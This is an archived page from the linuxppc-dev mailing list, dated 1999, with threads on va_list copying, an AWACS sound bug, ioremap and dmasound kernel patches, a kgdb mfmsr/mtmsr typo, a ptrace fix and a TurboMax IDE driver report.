> I have found what *appears* to be a bug in the C compiler.  I have experienced
> this bug in R4 (regardless of the compiler/library installed) as well as in
> the latest (i.e. all the latest packages through 5/15/1999) pre-R5
> installation.  I include a short program below which illustrates the problem
> I am having.  The code compiles without error on my i386 machine
> running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
> PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
> Any input is greatly appreciated.
> 
> The code is as follows:
> 
> test.c:
> 
>      #include <stdio.h>
>      #include <stdarg.h>
> 
>      static int myFunction(va_list inList)
>      {
>         va_list newList;
>         newList = inList;
>      }


Try this:

      #include <stdio.h>
      #include <stdarg.h>

      static int myFunction(va_list inList)
      {
         va_list newList;
         
	 __va_copy(newList, inList);
      }




-- 
 Dipl.-Ing. (FH) Hartmut Koptein                       EMail:
 Friedrich-van-Senden-Str. 7                           
 26603 Aurich   
 Tel.: +49-4941-10390                                  koptein@debian.org


^ permalink raw reply	[relevance 64%]

* Re: possible egcs c compiler bug
  1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
  1999-05-19 20:56 64% ` Brad Boyer
  1999-05-19 21:04 64% ` Hartmut Koptein
@ 1999-05-19 21:26 64% ` Franz Sirl
  2 siblings, 0 replies; 200+ results
From: Franz Sirl @ 1999-05-19 21:26 UTC (permalink / raw)
  To: linuxppc-dev, Thomas C. Allison, linuxppc-user


Am Wed, 19 May 1999 schrieb Thomas C. Allison:
>I have found what *appears* to be a bug in the C compiler.  I have experienced
>this bug in R4 (regardless of the compiler/library installed) as well as in
>the latest (i.e. all the latest packages through 5/15/1999) pre-R5
>installation.  I include a short program below which illustrates the problem
>I am having.  The code compiles without error on my i386 machine
>running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
>PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
>Any input is greatly appreciated.
>
>The code is as follows:
>
>test.c:
>
>     #include <stdio.h>
>     #include <stdarg.h>
>
>     static int myFunction(va_list inList)
>     {
>        va_list newList;
>        newList = inList;
>     }
>
>When I try to compile the code
>
>     % gcc -c test.c
>
>I get the following error message
>
>     test.c: In function `myFunction':
>     test.c:7: incompatible types in assignment
>
>Any ideas?

That is simply unportable code. va_list may be of any underlying type, and is in
this case an array. If you want portable code, use:

     static int myFunction(va_list inList)
     {
        va_list newList;
        __va_copy(newList, inList);
     }

If you use varargs extensively in your application, I strongly recommend you to
use egcs-*1.1.2-12c or later on DRR1/preR5, which fixes some annoying bugs
in the ppc-linux varargs handling.
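
For a fuller picture of why a copy is needed at all, here is a small
self-contained sketch that walks the same argument list twice. It uses
va_copy(), the spelling that C99 later standardized for what GCC offered
as __va_copy() at the time; on a compiler without C99 support the
__va_copy() form above would be the one to try. The function names
format_alloc() and format_alloc_v() are made up for the example.

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

/* Formats into a freshly allocated string; the caller frees it.
 * Returns NULL on failure. */
char *format_alloc_v(const char *fmt, va_list ap)
{
	va_list ap2;
	int len;
	char *buf;

	assert(fmt != NULL);
	va_copy(ap2, ap);			/* not: ap2 = ap; */

	/* First pass consumes ap and only measures the output. */
	len = vsnprintf(NULL, 0, fmt, ap);
	if (len < 0) {
		va_end(ap2);
		return NULL;
	}

	/* Second pass needs an untouched list, hence the copy. */
	buf = malloc((size_t)len + 1);
	if (buf != NULL)
		vsnprintf(buf, (size_t)len + 1, fmt, ap2);
	va_end(ap2);
	return buf;
}

char *format_alloc(const char *fmt, ...)
{
	va_list ap;
	char *s;

	va_start(ap, fmt);
	s = format_alloc_v(fmt, ap);
	va_end(ap);
	return s;
}
```

Each va_copy() is paired with its own va_end(), just like va_start().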

Franz.


^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
@ 1999-05-24 22:00 64% Scott Sams
  1999-05-25 10:42 64% ` Benjamin Herrenschmidt
  0 siblings, 1 reply; 200+ results
From: Scott Sams @ 1999-05-24 22:00 UTC (permalink / raw)
  To: linuxppc-dev


Paul Mackerras <paulus@cs.anu.edu.au> wrote:

> What's happening is I think the same as what happens on the iMac: when
> you run the BootX app to boot linux, and it asks macos to shut down,
> macos shuts down the awacs, in such a fashion that the only thing that
> will start it up again is a hard reset. :-( 

I believe the same thing has happened on my box, although a hardware
reset has yet to fix the problem! :-<

Sound does not come out of either the internal speaker, or the line out
jack. Playing a .wav or a CD produces no sound. MacOS will not play any
sounds either. I have tried everything from hard resets to power cycling to
zapping the PRAM 3 times, and nothing has brought my sound back. Do any
of you hardware gurus out there know if it is possible to manually reset
the AWACS chip? Does this mean I fried my AWACS chip? How could I
replace it if necessary? Please help.

Thanks,

Scott Sams

-- 
 ____ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      Scott Sams         
(____  _  _-|-|-                    sbsams@eos.ncsu.edu      
_____)(__(_)| |        http://www.catt.ncsu.edu/~sbsams
~~~~~~~~~~~~~~~~


^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
  1999-05-24 22:00 64% AWACS Bug Scott Sams
@ 1999-05-25 10:42 64% ` Benjamin Herrenschmidt
  0 siblings, 0 replies; 200+ results
From: Benjamin Herrenschmidt @ 1999-05-25 10:42 UTC (permalink / raw)
  To: Scott Sams, linuxppc-dev


On Mon, May 24, 1999, Scott Sams <sbsams@eos.ncsu.edu> wrote:

>Paul Mackerras <paulus@cs.anu.edu.au> wrote:
>
>> What's happening is I think the same as what happens on the iMac: when
>> you run the BootX app to boot linux, and it asks macos to shut down,
>> macos shuts down the awacs, in such a fashion that the only thing that
>> will start it up again is a hard reset. :-( 

I do have a fix for that but this fix is still not tested and not in
BootX. I'll try to find some time to finish it sometime this week. (The fix
is a hack: I patch the MacOS burgundy driver to prevent the shutdown.
Also this works only with versions of the driver that do export their
function names thru the TOC, which may not be the case of future versions).


-- 
           Perso. e-mail: <mailto:bh40@calva.net>
           Work   e-mail: <mailto:benh@mipsys.com>
BenH.      Web   : <http://calvaweb.calvacom.fr/bh40/>





^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
       [not found]     <Pine.GSO.4.05.9905251646130.14882-100000@mail.wesleyan.edu>
@ 1999-05-27  4:42 64% ` Scott Sams
  1999-05-27  5:19 58%   ` Jason Y. Sproul
  0 siblings, 1 reply; 200+ results
From: Scott Sams @ 1999-05-27  4:42 UTC (permalink / raw)
  To: jsproul, linuxppc-dev


Thank you for the helpful information. However, neither of the tricks
you suggested helped me. Is it possible to damage the AWACS chip on the
motherboard (maybe by an electrical surge?) and still have the machine
run? 

I guess I will have to install a new card. Do you know of any other PCI
sound cards that work under linuxppc on a powermac?

Thanks,

Scott

Jason Y. Sproul wrote:
> 
> Have you tried a motherboard reset and/or powerdown? For the former, you
> have to locate the reset switch on the motherboard - should be near the
> battery. For the latter, you have to yank the backup battery on the
> motherboard and leave it out and the machine unconnected to *anything* for
> at least four hours. (Overnight is preferable.) I've seen Macs get wedged
> badly enough that an mboard powerdown and a few hits of the reset were
> necessary to flush everything. Developing PCI cards isn't always fun...
> 
> ........................................................................
> Jason Y. Sproul                    http://www.con.wesleyan.edu/~jsproul/
> jsproul@wesleyan.edu            jsproul@iced.com    http://www.iced.com/
>      Eagles may soar, but weasels don't get sucked into jet engines.

-- 
 ____ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      Scott Sams         
(____  _  _-|-|-                    sbsams@eos.ncsu.edu      
_____)(__(_)| |        http://www.catt.ncsu.edu/~sbsams
~~~~~~~~~~~~~~~~


^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
  1999-05-27  4:42 64% ` Scott Sams
@ 1999-05-27  5:19 58%   ` Jason Y. Sproul
  0 siblings, 0 replies; 200+ results
From: Jason Y. Sproul @ 1999-05-27  5:19 UTC (permalink / raw)
  To: Scott Sams; +Cc: linuxppc-dev


On Thu, 27 May 1999, Scott Sams wrote:

> Thank you for the helpful information. However, neither of the tricks
> you suggested helped me.

Wow... That sounds rather hard-core.

> Is it possible to damage the AWACS chip on the motherboard (maybe by an
> electrical surge?) and still have the machine run?

I suppose so, although it would almost certainly have to come from a source
other than the motherboard that could create a voltage across just the
AWACS without also toasting other components. Highly improbable. A simple
statistical failure of the chip itself is more likely than that, though a
short in the connections to the various outputs is possible too.

1. You mentioned checking the ports. There should be fuses on all of them,
in theory, as well as the speaker lines. Fuses burn out.

2. Instrument the AWACS driver heavily with printk()s and see if the
various settings of the control registers are actually working, or if the
chip is a total zombie.

3. If you've got a voltmeter (or, in a perfect world, an oscilloscope) try
watching the various output lines as you play sounds. Single frequencies
are best if you've got an oscilloscope that'll trigger on them. If there's
a signal there, you can probably trace the failure to another component
that might be replaceable with a bit of surgery. (Amplifier, pull-up
resistor, capacitor, wiring, something like that.) Work backwards from the
output port contacts towards the AWACS using the port specs in your user's
guide technical appendix. I assume that the AWACS clocks from the bus, but
you might want to make sure there's not an associated clock that's gone
dead. Try not to short out your entire motherboard in the process.

If the above all fail, you're probably SOL.

> I guess I will have to install a new card. Do you know of any other PCI
> sound cards that work under linuxppc on a powermac?

Not offhand. I've been meaning to explore this, but I've already got too
much going on just now. :^)

........................................................................
Jason Y. Sproul                    http://www.con.wesleyan.edu/~jsproul/
jsproul@wesleyan.edu        jsproul@iced.com        http://www.iced.com/
     Eagles may soar, but weasels don't get sucked into jet engines.


[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 58%]

* Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  @ 1999-06-02 12:19 59% ` Martin Costabel
  1999-06-03  1:24 64%   ` Ryuichi Oikawa
  1999-06-03  2:50 64%   ` Paul Mackerras
  0 siblings, 2 replies; 200+ results
From: Martin Costabel @ 1999-06-02 12:19 UTC (permalink / raw)
  To: linuxppc-dev; +Cc: Cort Dougan


A while ago I reported boot problems with the vger 2.3.x kernel
after May 22. Now I found that this same bug has crept into the "stable"
tree, starting with 2.2.10 on May 30. After some digging, I found the
culprit. It is the file arch/ppc/mm/init.c, patched (wrongly) as
follows:

root[17]#cvs diff -u -r1.165 -r1.166 arch/ppc/mm/init.c
Index: arch/ppc/mm/init.c
===================================================================
RCS file: /cvs/linux/linux/arch/ppc/mm/init.c,v
retrieving revision 1.165
retrieving revision 1.166
diff -u -r1.165 -r1.166
--- arch/ppc/mm/init.c  1999/05/14 22:37:29     1.165
+++ arch/ppc/mm/init.c  1999/05/22 18:18:30     1.166
@@ -1,5 +1,5 @@
 /*
- *  $Id: init.c,v 1.165 1999/05/14 22:37:29 cort Exp $
+ *  $Id: init.c,v 1.166 1999/05/22 18:18:30 cort Exp $
  *
  *  PowerPC version 
  *    Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
@@ -402,7 +402,7 @@
    for (i = 0; i < size; i += PAGE_SIZE)
        map_page(&init_task, v+i, p+i, flags);
 out:
-   return (void *) (v + (p & ~PAGE_MASK));
+   return (void *) (v + (addr & ~PAGE_MASK));
 }
 
 void iounmap(void *addr)

This patch was proposed on May 21 by R. Oikawa and corrected almost
immediately; see
http://lists.linuxppc.org/listarcs/linuxppc-user/199905/msg00680.html
Unfortunately, the correction didn't make it into the vger tree. I don't
know if the correction is good, but I never had problems with the
version before the patch.

In addition to the two problems mentioned below, I also found that the
2.2.10 kernel writes binary garbage into my /var/log/messages file,
which eventually becomes completely corrupted. When trying to read it,
I get I/O errors (reading beyond end of device).

--
Martin

Martin Costabel wrote:
> 
> On my 6400/200, the 2.3.3 (now 2.3.4) kernel from the vger tree has
> problems that started last Sunday:
> 
> The sources checked out on May 21 give a kernel that runs perfectly, but
> starting from updates on May 22 and until right now, two problems showed
> up whose origin I could not identify, although I spent time staring at
> source files and cvs logs and trying things:
> 
> The first one is related to the IDE driver. At boot time, in the
> partition check section, it gives me
>    kernel: Partition check:
>    kernel:  sda: sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sda10
>    kernel:  sdb: sdb1 sdb2 sdb3
>    kernel:  hda:hda: timeout waiting for DMA
>    kernel: hda: irq timeout: status=0x58 { DriveReady SeekComplete DataRequest }
>    kernel: hda: DMA disabled
>    kernel: ide0: reset: success
>    atd: atd startup succeeded
>    kernel:  hda1 hda2 hda3 hda4 hda5 hda6 hda7 hda8 hda9 hda10 hda11 hda12 hda13
>    kernel: VFS: Mounted root (ext2 filesystem) readonly.
> With the May 21 kernel, I get only, like always before,
>    kernel: Partition check:
>    kernel:  sda: sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sda10
>    kernel:  sdb: sdb1 sdb2 sdb3
>    kernel:  hda: hda1 hda2 hda3 hda4 hda5 hda6 hda7 hda8 hda9 hda10 hda11 hda12 hda13
>    kernel: VFS: Mounted root (ext2 filesystem) readonly.
> The effect of this is that the HD is slower with the newer kernel: I use
> hdparm -p /dev/hda to tune it and usually get 4.35 MB/sec instead of
> 1.88 MB/sec. With the new kernel, it stays at 1.88 MB/sec, whatever I
> try.
> 
> The second problem: I have a one-line script in /etc/rc.d that
> initializes the printer port:
>    stty raw 57600 crtscts -echo < /dev/ttyS1
> With the new kernel, the boot process hangs while trying to execute this
> script, and I have to do a hard reboot. If I comment this line out, the
> boot process succeeds. Afterwards, I can execute the script manually
> without problem.

^ permalink raw reply	[relevance 59%]

* patch for dmasound bug
@ 1999-06-02 20:05 64% Ryan Nielsen
  1999-06-10 22:56 63% ` Alvin Brattli
  0 siblings, 1 reply; 200+ results
From: Ryan Nielsen @ 1999-06-02 20:05 UTC (permalink / raw)
  To: linuxppc-dev


This restores the rate/byteswap to normal after playing a beep.
Without this patch, if you for example stop timidity, make a beep,
and resume, the sound will be slower than normal.

--- linux/drivers/sound/dmasound.c	1999/02/05 05:45:42	1.41
+++ linux/drivers/sound/dmasound.c	1999/06/02 19:42:08
@@ -3255,6 +3255,11 @@
 	save_flags(flags); cli();
 	if (beep_playing) {
 		st_le16(&beep_dbdma_cmd->command, DBDMA_STOP);
+		out_le32(&awacs_txdma->control, (RUN|PAUSE|FLUSH|WAKE) << 16);
+		out_le32(&awacs->control,
+			 (in_le32(&awacs->control) & ~0x1f00)
+			 | (awacs_rate_index << 8));
+		out_le32(&awacs->byteswap, sound.hard.format != AFMT_S16_BE);
 		beep_playing = 0;
 	}
 	restore_flags(flags);
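
The control-register update in the patch is a read-modify-write of one bit field. A minimal stand-alone sketch of that pattern follows; `set_rate_field`, `RATE_SHIFT` and `RATE_MASK` are names made up for illustration, and the field position (bits 8 to 12) is inferred only from the `~0x1f00` mask and the `<< 8` shift in the diff. Unlike the patch, the sketch also masks the shifted value so an out-of-range index cannot spill into neighbouring bits.

```c
#include <stdint.h>

#define RATE_SHIFT 8
#define RATE_MASK  0x1f00u   /* bits 8..12, matching ~0x1f00 in the patch */

/*
 * Return `control` with its rate field replaced by `rate_index`.
 * All bits outside the field are preserved.
 */
uint32_t set_rate_field(uint32_t control, uint32_t rate_index)
{
    return (control & ~RATE_MASK)                      /* clear the old field */
         | ((rate_index << RATE_SHIFT) & RATE_MASK);   /* insert the new one  */
}
```

For example, `set_rate_field(0xffffffff, 3)` clears bits 8 to 12 and then sets the field to 3, leaving every other bit as it was.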

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-02 12:19 59% ` Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4) Martin Costabel
@ 1999-06-03  1:24 64%   ` Ryuichi Oikawa
  1999-06-03  2:50 64%   ` Paul Mackerras
  1 sibling, 0 replies; 200+ results
From: Ryuichi Oikawa @ 1999-06-03  1:24 UTC (permalink / raw)
  To: costabel; +Cc: linuxppc-dev, cort


From: Martin Costabel <costabel@wanadoo.fr>
Subject: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)

> Index: arch/ppc/mm/init.c
> ===================================================================
> RCS file: /cvs/linux/linux/arch/ppc/mm/init.c,v
> retrieving revision 1.165
> retrieving revision 1.166
> diff -u -r1.165 -r1.166
> --- arch/ppc/mm/init.c  1999/05/14 22:37:29     1.165
> +++ arch/ppc/mm/init.c  1999/05/22 18:18:30     1.166
> @@ -1,5 +1,5 @@
>  /*
> - *  $Id: init.c,v 1.165 1999/05/14 22:37:29 cort Exp $
> + *  $Id: init.c,v 1.166 1999/05/22 18:18:30 cort Exp $
>   *
>   *  PowerPC version 
>   *    Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
> @@ -402,7 +402,7 @@
>     for (i = 0; i < size; i += PAGE_SIZE)
>         map_page(&init_task, v+i, p+i, flags);
>  out:
> -   return (void *) (v + (p & ~PAGE_MASK));
> +   return (void *) (v + (addr & ~PAGE_MASK));
>  }
>  
>  void iounmap(void *addr)
> 
> This patch had been proposed on May 21 by R. Oikawa and almost
> immediately been corrected, see
> http://lists.linuxppc.org/listarcs/linuxppc-user/199905/msg00680.html
> Unfortunately, the correction didn't make it into the vger tree. I don't
> know if the correction is good, but I never had problems with the
> version before the patch.
Sorry, but please see the newer patch in msg00680.html. Simply replacing
-   return (void *) (v + (p & ~PAGE_MASK));
+   return (void *) (v + (addr & ~PAGE_MASK));
breaks ioremap for BAT-mapped devices (for example, mac-io/heathrow devices
such as ide, mace, bmac, etc.). Please use the newer one.
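
To make the failure concrete, here is a small user-space model of the BAT path only. Everything in it is an assumption for illustration: `model_mapped_by_bats` is a stand-in for p_mapped_by_bats() that identity-maps one made-up 16 MB window, pages are taken to be 4 KB, and `p` is assumed to be the page-aligned form of `addr`. The one property carried over from the patches discussed here is that a lookup done with an unaligned address returns a virtual address that already contains the page offset.

```c
#define PAGE_SHIFT 12
#define PAGE_SIZE  (1UL << PAGE_SHIFT)
#define PAGE_MASK  (~(PAGE_SIZE - 1))

/* Stand-in for p_mapped_by_bats(): one identity-mapped window.
 * Returns 0 when the address is not covered by the window. */
static unsigned long model_mapped_by_bats(unsigned long pa)
{
    if (pa >= 0xf3000000UL && pa < 0xf4000000UL)
        return pa;   /* keeps whatever page offset pa carried */
    return 0;
}

/* Revision 1.166 alone: look up with addr, then add addr's offset. */
unsigned long remap_r1_166(unsigned long addr)
{
    unsigned long v = model_mapped_by_bats(addr);
    return v + (addr & ~PAGE_MASK);    /* offset is counted twice */
}

/* Alternative A: look up the page-aligned address instead. */
unsigned long remap_lookup_aligned(unsigned long addr)
{
    unsigned long p = addr & PAGE_MASK;
    unsigned long v = model_mapped_by_bats(p);
    return v + (addr & ~PAGE_MASK);    /* offset is added exactly once */
}

/* Alternative B: keep the lookup, but drop the offset afterwards. */
unsigned long remap_zero_addr(unsigned long addr)
{
    unsigned long v = model_mapped_by_bats(addr);
    if (v)
        addr = 0;                      /* v already contains the offset */
    return v + (addr & ~PAGE_MASK);
}
```

With `addr = 0xf3000123`, the first variant returns `0xf3000246` (the offset `0x123` applied twice), while both alternatives return `0xf3000123`.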


Regards,

Ryuichi Oikawa
roikawa@rr.iij4u.or.jp

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-02 12:19 59% ` Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4) Martin Costabel
  1999-06-03  1:24 64%   ` Ryuichi Oikawa
@ 1999-06-03  2:50 64%   ` Paul Mackerras
  1999-06-03  6:26 64%     ` Martin Costabel
  1999-06-03 22:24 64%     ` Martin Costabel
  1 sibling, 2 replies; 200+ results
From: Paul Mackerras @ 1999-06-03  2:50 UTC (permalink / raw)
  To: costabel; +Cc: linuxppc-dev, cort


Martin Costabel <costabel@wanadoo.fr> wrote:

> A while ago I reported about boot problems with the vger 2.3.x kernel
> after May 22. Now I found that this same bug has crept into the "stable"
> tree, starting with 2.2.10 on May 30. After some digging, I found the
> culprit. It is the file arch/ppc/mm/init.c, patched (wrongly) as
> follows:
[snip]
> -   return (void *) (v + (p & ~PAGE_MASK));
> +   return (void *) (v + (addr & ~PAGE_MASK));

In fact that patch is correct but you also need this patch (which I'm
about to check into vger):

--- linux/arch/ppc/mm/init.c	Sat May 29 20:24:09 1999
+++ pmac/arch/ppc/mm/init.c	Thu Jun  3 10:13:00 1999
@@ -371,7 +371,7 @@
 	 * same virt address (and this is contiguous).
 	 *  -- Cort
 	 */
-	if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ )
+	if ( (v = p_mapped_by_bats(p)) /*&& p_mapped_by_bats(p+size-1)*/ )
 		goto out;
 #endif /* CONFIG_8xx */
 	
Paul.

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-03  2:50 64%   ` Paul Mackerras
@ 1999-06-03  6:26 64%     ` Martin Costabel
  1999-06-03 22:24 64%     ` Martin Costabel
  1 sibling, 0 replies; 200+ results
From: Martin Costabel @ 1999-06-03  6:26 UTC (permalink / raw)
  To: Paul.Mackerras; +Cc: linuxppc-dev, cort


Paul Mackerras wrote:
> 
> Martin Costabel <costabel@wanadoo.fr> wrote:
> 
> > A while ago I reported about boot problems with the vger 2.3.x kernel
> > after May 22. Now I found that this same bug has crept into the "stable"
> > tree, starting with 2.2.10 on May 30. After some digging, I found the
> > culprit. It is the file arch/ppc/mm/init.c, patched (wrongly) as
> > follows:
> [snip]
> > -   return (void *) (v + (p & ~PAGE_MASK));
> > +   return (void *) (v + (addr & ~PAGE_MASK));
> 
> In fact that patch is correct but you also need this patch (which I'm
> about to check into vger):
> 
> --- linux/arch/ppc/mm/init.c    Sat May 29 20:24:09 1999
> +++ pmac/arch/ppc/mm/init.c     Thu Jun  3 10:13:00 1999
> @@ -371,7 +371,7 @@
>          * same virt address (and this is contiguous).
>          *  -- Cort
>          */
> -       if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ )
> +       if ( (v = p_mapped_by_bats(p)) /*&& p_mapped_by_bats(p+size-1)*/ )
>                 goto out;
>  #endif /* CONFIG_8xx */

In the meantime I applied the second patch proposed by Ryuichi Oikawa, and it 
works for me. I am writing this running under 2.3.4. This patch is  

 diff -u -r1.166 init.c
--- arch/ppc/mm/init.c  1999/05/22 18:18:30     1.166
+++ arch/ppc/mm/init.c  1999/06/02 22:51:47
@@ -371,8 +371,10 @@
         * same virt address (and this is contiguous).
         *  -- Cort
         */
-       if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ )
+       if ( (v = p_mapped_by_bats(addr)) /*&& p_mapped_by_bats(addr+(size-1))*/ ){
+               addr = 0; /* v already contains page offset */
                goto out;
+       }
 #endif /* CONFIG_8xx */

        if (mem_init_done) {

Note that I don't understand what is going on here. I am just your 
typical dumb user :-)

--
Martin

^ permalink raw reply	[relevance 64%]

* Re: Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  1999-06-03  2:50 64%   ` Paul Mackerras
  1999-06-03  6:26 64%     ` Martin Costabel
@ 1999-06-03 22:24 64%     ` Martin Costabel
  1 sibling, 0 replies; 200+ results
From: Martin Costabel @ 1999-06-03 22:24 UTC (permalink / raw)
  To: Paul.Mackerras; +Cc: linuxppc-dev, cort


Paul Mackerras wrote:

> In fact that patch is correct but you also need this patch (which I'm
> about to check into vger):
[...]

2.3.5 is now running OK.

Thanks

--
Martin

^ permalink raw reply	[relevance 64%]

* Bug report
@ 1999-06-07  8:54 64% Alexander Larsson
  1999-06-07 13:53 64% ` Dan Malek
  0 siblings, 1 reply; 200+ results
From: Alexander Larsson @ 1999-06-07  8:54 UTC (permalink / raw)
  To: dmalek, linuxppc-dev


In the embedded 2.2.5 sources I found the following in
arch/ppc/kernel/ppc-stub.c


static inline void set_msr(int msr)
{
	asm volatile("mfmsr %0" : : "r" (msr));
}

Shouldn't that be mtmsr?

/ Alex


^ permalink raw reply	[relevance 64%]

* Re: Bug report
  1999-06-07  8:54 64% Bug report Alexander Larsson
@ 1999-06-07 13:53 64% ` Dan Malek
  0 siblings, 0 replies; 200+ results
From: Dan Malek @ 1999-06-07 13:53 UTC (permalink / raw)
  To: Alexander Larsson; +Cc: linuxppc-dev


Alexander Larsson wrote:

> 
> In the embedded 2.2.5 sources i found the following in
> arch/ppc/kernel/ppc-stub.c
> 
> static inline void set_msr(int msr)
> {
>         asm volatile("mfmsr %0" : : "r" (msr));
> }
> 
> Shouldn't that be mtmsr?

Yes. Fortunately, it is only used in the kgdb portion of the
kernel, so normal operations are not affected.
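
For reference, a sketch of how the two directions differ. `mfmsr` moves the MSR into a general register, so it needs an output operand; `mtmsr` moves a general register into the MSR, so it takes an input operand. Both are supervisor-level instructions, so the real versions are only compiled when the hypothetical macro `PPC_SUPERVISOR_BUILD` is defined on a PowerPC target; otherwise a plain variable stands in for the register so the pair can be tried anywhere. This is an illustration, not the fix as it was committed.

```c
#if defined(__powerpc__) && defined(PPC_SUPERVISOR_BUILD)

/* Read the machine state register: MSR -> general register. */
static inline unsigned long get_msr(void)
{
    unsigned long msr;
    __asm__ __volatile__("mfmsr %0" : "=r" (msr));
    return msr;
}

/* Write the machine state register: general register -> MSR. */
static inline void set_msr(unsigned long msr)
{
    __asm__ __volatile__("mtmsr %0" : : "r" (msr));
}

#else

/* Fallback model: an ordinary variable plays the role of the MSR. */
static unsigned long simulated_msr;

static inline unsigned long get_msr(void)
{
    return simulated_msr;
}

static inline void set_msr(unsigned long msr)
{
    simulated_msr = msr;
}

#endif
```

With the original `mfmsr` in set_msr(), the instruction would overwrite the register holding the argument and leave the MSR untouched, so a following get_msr() would not see the new value.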


	-- Dan

^ permalink raw reply	[relevance 64%]

* [PATCH] Re: Bug: Tracing recursive system calls
       [not found]     <E10r9LE-0006v4-00@the-village.bc.nu>
@ 1999-06-09  1:10 64% ` Nate Eldredge
  0 siblings, 0 replies; 200+ results
From: Nate Eldredge @ 1999-06-09  1:10 UTC (permalink / raw)
  To: Alan Cox; +Cc: linux-kernel

Alan Cox wrote:
> 
> > syscall_trace is in the fast path?!?  It only gets called when a process
> > is being traced, and nobody expects traced processes to run extremely
> > fast, do they?
> 
> Fast path for tracing syscalls. It would be nice to avoid a check every
> trace is what I mean.
> 
> > The problem isn't that the child thread is traced, it's that the `clone'
> > call itself from `kernel_thread' is traced.  So one would have to clear
> > the flag and then reset it in the parent.
> 
> Ok
> 
> > Besides, this doesn't suffice.  There are other places in the kernel
> > that make system calls (there's a `waitpid' in `request_module' for
> > instance).  We would need to find and change all of these and institute
> > a rule for the future, or else change the inline asm definitions in
> > asm/unistd.h.  Either seems a lot more complex.
> 
> Good point. My solution is simple elegant and wrong.

Then here is a patch.  It is against 2.2.10pre2, but I suspect it will
apply to other versions.  I make no claim for its elegance, etc, but it
works for me.  If anyone thinks of a better one, that would be nice.

The other arches should probably adopt similar changes.  I don't know
enough about anything but Intel to do it.

--- arch/i386/kernel/ptrace.c.bak       Mon Jun  7 13:37:01 1999
+++ arch/i386/kernel/ptrace.c   Tue Jun  8 17:51:36 1999
@@ -675,11 +675,14 @@
        return ret;
 }
 
-asmlinkage void syscall_trace(void)
+asmlinkage void syscall_trace(int unused)
 {
+       struct pt_regs *regs = (struct pt_regs *) &unused;
        if ((current->flags & (PF_PTRACED|PF_TRACESYS))
                        != (PF_PTRACED|PF_TRACESYS))
                return;
+       if (!user_mode(regs))
+               return; /* Don't trace the kernel's syscalls */
        current->exit_code = SIGTRAP;
        current->state = TASK_STOPPED;
        notify_parent(current, SIGCHLD);
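
For readers unfamiliar with the test the patch relies on, here is a stand-alone model of it. On i386 the saved register frame records the code segment and flags at the time of the trap, and a frame counts as user mode if the virtual-8086 flag is set or the privilege bits of the saved CS are non-zero. `struct model_regs` and `model_user_mode` are illustrative names, not the kernel's own definitions, and the selector values mentioned afterwards are examples only.

```c
#define VM_MASK 0x00020000UL   /* EFLAGS.VM: virtual-8086 mode */

/* Cut-down stand-in for the saved register frame. */
struct model_regs {
    unsigned long eflags;   /* saved flags register */
    unsigned long xcs;      /* saved code segment selector */
};

/*
 * Non-zero if the frame was saved while running in user mode:
 * either vm86 mode, or a CS selector whose low two (privilege)
 * bits are not zero.
 */
int model_user_mode(const struct model_regs *regs)
{
    return (regs->eflags & VM_MASK) != 0 || (regs->xcs & 3) != 0;
}
```

A frame with CS `0x10` (ring 0) and VM clear is treated as a kernel-originated call and skipped by the tracer; a frame with CS `0x23` (ring 3) is traced as before.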

-- 

Nate Eldredge
nate@cartsys.com

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

^ permalink raw reply	[relevance 64%]

* TurboMax driver bug
@ 1999-06-09  3:28 59% Brian C Burke
  0 siblings, 0 replies; 200+ results
From: Brian C Burke @ 1999-06-09  3:28 UTC (permalink / raw)
  To: linuxppc-dev


I downloaded the vmlinux-blueg3v2 kernel from linuxppc.org and it supports
the TurboMax card and attached Maxtor drives on my beige G3 rev1. However,
the cdrom drive at hdc shows up as a twin of the motherboard Quantum drive
at hda and is not accessible. This can be seen in the startup printout that
follows.


AEC6210: IDE controller on PCI bus 00 dev 70
AEC6210: not 100% native mode: will probe irqs later
AEC6210: ROM enabled at 0x81800001
    ide2: BM-DMA at 0xfe000400-0xfe000407, BIOS settings: hde:DMA, hdf:pio
    ide3: BM-DMA at 0xfe000408-0xfe00040f, BIOS settings: hdg:DMA, hdh:pio
hda: QUANTUM FIREBALL ST4300A, ATA DISK drive
hdc: QUANTUM FIREBALL ST4300A, ATA DISK drive
